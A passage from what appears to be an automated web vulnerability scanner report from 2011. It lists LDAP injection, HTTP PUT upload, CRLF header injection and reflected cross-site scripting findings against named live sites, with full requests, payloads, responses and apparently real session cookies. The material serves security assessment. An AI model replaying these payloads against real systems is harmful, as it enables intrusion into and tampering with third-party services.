                   <a href="http://www.washingtonpost.com/lifestyle/style/weighing-in-on-what-kate-middleton-wore-on-her-wedding-day/2011/04/29/AF6O1MHF_story.html">Weighing in on what Kate Middleton wore on her wedding day</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/business/economy/obama-slams-oil-company-profits-as-gas-prices-surge/2011/04/29/AFPhwyGF_story.html">Obama slams oil company profits as gas prices surge</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/world/big-question-day-after-royal-wedding-is-where-prince-william-kate-middleton-will-honeymoon/2011/04/30/AFMfm5JF_story.html">Prince William, Kate Middleton try to carve out some private time; ask media to back</a>
               </li>
           </ul>
   </div>
   <div class="wp-column five">
       <ul class="normal">
           <li>
                   <a href="http://www.washingtonpost.com/opinions/imagining-a-world-without-the-dollar/2011/04/26/AFjawKEF_story.html">Imagining a world without the dollar</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/the-relentless-smear-campaign-against-obama/2011/04/29/AFkSVyGF_story.html">The relentless smear campaign against Obama</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/birthers-buffoonery-and-a-sad-discourse/2011/04/29/AFdnwyGF_story.html">Birthers, buffoonery and a sad discourse</a>
               </li>
           <li>
                   <a href="http://live.washingtonpost.com/white-house-correspondents-dinner-2011-recap.html">2011 White House Correspondents Dinner: A recap - 2011 White House Correspondents</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/the_obama_doctrine_leading_from_behind/201
...[SNIP]...

4.3. http://www.washingtonpost.com/wp-srv/ssi/globalnav/js/channelnavLogo.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.washingtonpost.com
Path:   /wp-srv/ssi/globalnav/js/channelnavLogo.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. The two requests produced different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /*)(sn=*/ssi/globalnav/js/channelnavLogo.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
ETag: edf9973f-dbc0-444a-90a1-fdb5e628ed9c
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: max-age=120
Date: Sun, 01 May 2011 23:33:21 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 64073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<a href="http://www.washingtonpost.com/opinions/why-do-americans-still-dislike-atheists/2011/02/18/AFqgnwGF_story.html">Why do Americans still dislike atheists?</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/2011/04/06/AFNEgnqC_story.html">Why Glenn Beck lost it</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/lifestyle/style/weighing-in-on-what-kate-middleton-wore-on-her-wedding-day/2011/04/29/AF6O1MHF_story.html">Weighing in on what Kate Middleton wore on her wedding day</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/business/economy/obama-slams-oil-company-profits-as-gas-prices-surge/2011/04/29/AFPhwyGF_story.html">Obama slams oil company profits as gas prices surge</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/world/big-question-day-after-royal-wedding-is-where-prince-william-kate-middleton-will-honeymoon/2011/04/30/AFMfm5JF_story.html">Prince William, Kate Middleton try to carve out some private time; ask media to back</a>
               </li>
           </ul>
   </div>
   <div class="wp-column five">
       <ul class="normal">
           <li>
                   <a href="http://www.washingtonpost.com/opinions/imagining-a-world-without-the-dollar/2011/04/26/AFjawKEF_story.html">Imagining a world without the dollar</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/the-relentless-smear-campaign-against-obama/2011/04/29/AFkSVyGF_story.html">The relentless smear campaign against Obama</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/birthers-buffoonery-and-a-sad-discourse/2011/04/29/AFdnwyGF_story.html">Birthers, buffoonery and a sad discourse</a>
               </li>
           <li>
                   <a href="http://live.washingtonpost.com/white-house-correspondents-dinner-2011-recap.html">2011 White House Correspondents Dinner: A recap - 2011 White House Correspondents</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/the_obama_doctrine_leading_from_behind/201
...[SNIP]...

Request 2

GET /*)!(sn=*/ssi/globalnav/js/channelnavLogo.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
ETag: f9bc6c41-6fd2-481e-b2a1-0a475f93cc95
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: max-age=119
Date: Sun, 01 May 2011 23:33:21 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 64229

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<a href="http://www.washingtonpost.com/business/economy/running-in-the-red-how-the-us-on-the-road-to-surplus-detoured-to-massive-debt/2011/04/28/AFFU7rNF_story.html">Running in the red: How the U.S., on the road to surplus, detoured to massive debt</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/why-do-americans-still-dislike-atheists/2011/02/18/AFqgnwGF_story.html">Why do Americans still dislike atheists?</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/sports/redskins/nfl-draft-2011-redskins-add-nine-more-draft-picks-for-a-total-of-12/2011/04/30/AFTZo7NF_story.html">NFL draft 2011: Redskins add nine more draft picks for a total of 12</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/2011/04/06/AFNEgnqC_story.html">Why Glenn Beck lost it</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/local/tornado-tally-at-19-for-maryland-and-virginia/2011/04/30/AFySjwOF_story.html">Tornado tally at 19 for Maryland and Virginia</a>
               </li>
           </ul>
   </div>
   <div class="wp-column five">
       <ul class="normal">
           <li>
                   <a href="http://www.washingtonpost.com/world/libya-frontline-turns-quiet-as-rebels-regroup/2011/04/29/AFEwjwNF_story.html">Libya front line turns quiet as rebels regroup</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/lifestyle/style/weighing-in-on-what-kate-middleton-wore-on-her-wedding-day/2011/04/29/AF6O1MHF_story.html">Weighing in on what Kate Middleton wore on her wedding day</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/imagining-a-world-without-the-dollar/2011/04/26/AFjawKEF_story.html">Imagining a world without the dollar</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/world/big-question-day-after-royal-wedding-is-where-prince-william-kate-middleton-will-honeymoon/2011/04/30/AFMfm5JF_story.html">Prince William, Kate Middleton try to carve out some private time; ask media to back</a
...[SNIP]...

5. HTTP PUT enabled
There are 2 instances of this issue:


5.1. http://www.onlinemicrofiche.com/favicon.ico

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onlinemicrofiche.com
Path:   /favicon.ico

Issue detail

HTTP PUT is enabled on the web server. The file /1a950014e4506089.txt was uploaded to the server using the PUT verb, and the contents of the file were subsequently retrieved using the GET verb.

Request 1

PUT /1a950014e4506089.txt HTTP/1.0
Host: www.onlinemicrofiche.com
Content-Length: 16

e5dcc84f7b5a59c8

Response 1

HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 00:38:02 GMT
Location: http://www.onlinemicrofiche.com/1a950014e4506089.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Request 2

GET /1a950014e4506089.txt HTTP/1.0
Host: www.onlinemicrofiche.com

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 00:38:02 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Mon, 02 May 2011 00:38:02 GMT
ETag: W/"da9f931618cc1:dc0"
Content-Length: 16

e5dcc84f7b5a59c8

5.2. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /WPS/shoppingcart/checkout/Viewcart.asp

Issue detail

HTTP PUT is enabled on the web server. The file /29ed5e51742981e7.txt was uploaded to the server using the PUT verb, and the contents of the file were subsequently retrieved using the GET verb.

Request 1

PUT /29ed5e51742981e7.txt HTTP/1.0
Host: www.onlinemicrofiche.com
Content-Length: 16

8562c216a2d852a8

Response 1

HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:19:43 GMT
Location: https://www.onlinemicrofiche.com/29ed5e51742981e7.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Request 2

GET /29ed5e51742981e7.txt HTTP/1.0
Host: www.onlinemicrofiche.com

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:19:43 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Mon, 02 May 2011 03:19:43 GMT
ETag: W/"b8cdb9c7778cc1:dd2"
Content-Length: 16

8562c216a2d852a8

6. HTTP header injection
There are 6 instances of this issue:


6.1. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.16 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.Yahoo/B5116950.16

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 527ab%0d%0a3565611b9b4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /527ab%0d%0a3565611b9b4/N3382.Yahoo/B5116950.16;sz=150x30;pc=[TPAS_ID];click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bWFsbTd1cChnaWQkQlpWSEZXS0lSbGlLUm1lWlRhdFBrUUMycmNIVzgwMjk3YThBQWlCdCxzdCQxMzA0MjkyNzgzMjE4Njc4LHNpJDQ0NjQwNTEsdiQxLjAsYWlkJGlGdWVGVXdON3k0LSxjdCQyNSx5YngkTE9UVjlha25jZmtCTDgzNVFtUmduUSxyJDAscmQkMTZpZmY1MGZtKSk/1/*http://global.ard.yahoo.com/SIG=15g2ds2nv/M=999999.999999.999999.999999/D=news/S=96654906:FB/Y=YAHOO/EXP=1304299983/L=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt/B=iFueFUwN7y4-/J=1304292783275135/K=mbmuBMnyuFXFamzNMr12dQ/A=2394450929415713467/R=0/X=6/*;dcopt=rcl;mtfIFPath=nofile;ord=1304292783.275135? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/527ab
3565611b9b4
/N3382.Yahoo/B5116950.16;sz=150x30;pc=[TPAS_ID];click=http: //clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bWFsbTd1cChnaWQkQlpWSEZXS0lSbGlLUm1lWlRhdFBrUUMycmNIVzgwMjk3YThBQWlCdCxzdCQxMzA0MjkyNzgzMjE4Njc4LHNpJDQ0NjQwNTEsdiQxLjAsYWlkJGlGdWVGVXdON3k0LSxjdCQyNSx5YngkTE9UVjlha2
Date: Sun, 01 May 2011 23:34:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

6.2. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 83f32%0d%0a81dda35bbd7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /83f32%0d%0a81dda35bbd7/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/83f32
81dda35bbd7
/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http: //googleads.g.doubleclick.net/aclk
Date: Mon, 02 May 2011 02:29:48 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

6.3. http://ad.doubleclick.net/adj/wpni.jobs/front [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wpni.jobs/front

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 889bb%0d%0ac948c2d7ba2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /889bb%0d%0ac948c2d7ba2/wpni.jobs/front;sz=728x90;pos=ad1;poe=yes;ad=lb;del=js;ajax=n;dcopt=ist;ad=interstitial;heavy=y;pageId=wpni-wl-jobs-home;fromrss=n;rss=n;front=n;tile=1;ord=29166153864935040? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/889bb
c948c2d7ba2
/wpni.jobs/front;sz=728x90;pos=ad1;poe=yes;ad=lb;del=js;ajax=n;dcopt=ist;ad=interstitial;heavy=y;pageId=wpni-wl-jobs-home;fromrss=n;rss=n;front=n;tile=1;ord=29166153864935040:
Date: Sun, 01 May 2011 23:36:00 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

6.4. http://na.decdna.net/n/61239/71938/EI6/x/e [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://na.decdna.net
Path:   /n/61239/71938/EI6/x/e

Issue detail

The value of REST URL parameter 2 is copied into the location response header. The payload 81751%0d%0a4daf40cbe6 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /n/81751%0d%0a4daf40cbe6/71938/EI6/x/e?value=0&trans=&domain=na.decdna.net HTTP/1.1
Host: na.decdna.net
Proxy-Connection: keep-alive
Referer: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 01 May 2011 23:39:12 GMT
Server: Apache/2.2.3 (Red Hat)
Pragma: no-cache
Expires: Sun, 01 May 2011 23:39:12 GMT
location: http://dna1.mookie1.com/n/81751
4daf40cbe6
/71938/EI6/x/e?value=0&trans=&domain=na.decdna.net?0&value=0&trans=&domain=na.decdna.net&redirected
Content-Length: 0
Content-Type: text/plain


6.5. http://na.decdna.net/n/61239/71938/EI6/x/e [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://na.decdna.net
Path:   /n/61239/71938/EI6/x/e

Issue detail

The value of REST URL parameter 4 is copied into the location response header. The payload a58b5%0d%0aa827e2ca2c6 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /n/61239/71938/a58b5%0d%0aa827e2ca2c6/x/e?value=0&trans=&domain=na.decdna.net HTTP/1.1
Host: na.decdna.net
Proxy-Connection: keep-alive
Referer: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 01 May 2011 23:40:30 GMT
Server: Apache/2.2.3 (Red Hat)
Pragma: no-cache
Expires: Sun, 01 May 2011 23:40:30 GMT
location: http://dna1.mookie1.com/n/61239/71938/a58b5
a827e2ca2c6
/x/e?0&value=0&trans=&domain=na.decdna.net&redirected
Content-Length: 0
Content-Type: text/plain


6.6. http://na.decdna.net/n/61239/71938/EI6/x/e [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://na.decdna.net
Path:   /n/61239/71938/EI6/x/e

Issue detail

The value of REST URL parameter 5 is copied into the location response header. The payload 80700%0d%0af0193fdb2e3 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /n/61239/71938/EI6/80700%0d%0af0193fdb2e3/e?value=0&trans=&domain=na.decdna.net HTTP/1.1
Host: na.decdna.net
Proxy-Connection: keep-alive
Referer: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 01 May 2011 23:41:09 GMT
Server: Apache/2.2.3 (Red Hat)
Pragma: no-cache
Expires: Sun, 01 May 2011 23:41:09 GMT
location: http://dna1.mookie1.com/n/61239/71938/EI6/80700
f0193fdb2e3
/e?0&value=0&trans=&domain=na.decdna.net&redirected
Content-Length: 0
Content-Type: text/plain


7. Cross-site scripting (reflected)
There are 151 instances of this issue:


7.1. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9596"-alert(1)-"aec72338c29 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=f9596"-alert(1)-"aec72338c29 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7829
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 02 May 2011 02:28:57 GMT
Expires: Mon, 02 May 2011 02:28:57 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Mvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=f9596"-alert(1)-"aec72338c29http://www.tdameritrade.com/offer/250freetrades/?a=NVX&o=199&cid=GENRET;877237;62578498;239944784;41336049");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";

...[SNIP]...

7.2. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a68d"-alert(1)-"b83921a49ea was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

